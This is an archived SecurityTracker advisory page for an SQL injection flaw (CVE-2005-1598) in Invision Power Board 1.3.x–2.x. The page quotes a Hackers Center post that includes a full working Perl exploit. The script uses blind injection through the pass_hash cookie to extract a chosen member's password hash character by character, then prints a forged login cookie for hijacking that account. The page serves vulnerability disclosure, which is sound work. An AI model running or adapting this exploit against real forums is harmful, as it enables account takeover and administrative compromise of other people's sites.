SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Invision Power Board Vendors:   Invision Power Services
Invision Power Board Input Validation Flaw in 'login.php' Permits SQL Injection
SecurityTracker Alert ID:  1014499
SecurityTracker URL:  http://securitytracker.com/id/1014499
CVE Reference:   CVE-2005-1598   (Links to External Site)
Updated:  Jun 24 2008
Original Entry Date:  Jul 17 2005
Impact:   Disclosure of system information, Disclosure of user information, User access via network
Exploit Included:  Yes  
Version(s): 1.3.x - 2.x
Description:   Zinho from Hackers Center Security Group reported a vulnerability in Invision Power Board. A remote user can inject SQL commands.

The 'Login.php' script does not properly validate user-supplied input. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database. As a result, a remote user can gain administrative privileges on the target application.

hacky0u reported the exploit.

[Editor's note: It is not clear if this vulnerability is identical to the one reported in Alert ID 1013907 or a variation of that vulnerability. This has not been confirmed.]

Impact:   A remote user can inject SQL commands to gain administrative privileges.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.invisionboard.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [HSC Security] Invision PowerBoard 1.3.x - 2.x Exploit and Patch


Hackers Center Security Group (http://www.hackerscenter.com/)            
Zinho's Security Advisory           

Desc: Invision PowerBoard 1.3.x - 2.x Privilege escalation through SQL injection
Risk: High


hacky0u from  http://www.h4cky0u.org kindly reported to me an exploit working against 
1.3.x and 2.x versions of Invision Power board. 

The vulnerability affects sources/Login.php and leads to sql injection.

I've coded a quick fix available at 

http://www.hackerscenter.com/Archive/view.asp?id=3812


Here's the exploit code (Full credit to h4cky0u and other guys for it):

#!/usr/bin/perl -w 
################################################################## 
# This one actually works :) Just paste the outputted cookie into 
# your request header using livehttpheaders or something and you 
# will probably be logged in as that user. No need to decrypt it! 
# Exploit coded by "ReMuSOMeGa & Nova" and http://www.h4cky0u.org 
################################################################## 

use LWP::UserAgent; 

   $ua = new LWP::UserAgent; 
   $ua->agent("Mosiac 1.0" . $ua->agent); 

if (!$ARGV[0]) {$ARGV[0] = '';} 
if (!$ARGV[3]) {$ARGV[3] = '';} 

my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin'; 
my $user = $ARGV[1];   # userid to jack 
my $iver = $ARGV[2];   # version 1 or 2 
my $cpre = $ARGV[3];   # cookie prefix 
my $dbug = $ARGV[4];   # debug? 

if (!$ARGV[2]) 
{ 
        print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 
1/2].\n\n"; 
        exit; 
} 

my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f"); 

my $outputs = ''; 

for( $i=1; $i < 33; $i++ ) 
{ 
        for( $j=0; $j < 16; $j++ ) 
        { 
                my $current = $charset[$j]; 
            my $sql = ( $iver < 2 ) ?  
"99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" : 
"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2
527)/*"; 
                my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . 
"pass_hash=" . $sql); 
                my $res = $ua->get($path, @cookie); 

                # If we get a valid sql request then this 
                # does not appear anywhere in the sources 
                $pattern = '<title>(.*)Log In(.*)</title>'; 

                $_ = $res->content; 

                if ($dbug) { print }; 

                if ( !(/$pattern/) ) 
                { 
                        $outputs .= $current; 
                        print "$current\n"; 
                    last; 
                } 

        } 
  if ( length($outputs) < 1 )   { print "Not Exploitable!\n"; exit;     } 
} 
print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs; 
exit; 

# www.h4cky0u.org


- - - >
::[Hackers' center]::
Tons of tools, tutorials, papers, books,
articles, exploits...
www.hackerscenter.com

	<-:[@ZINHO@]:->
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC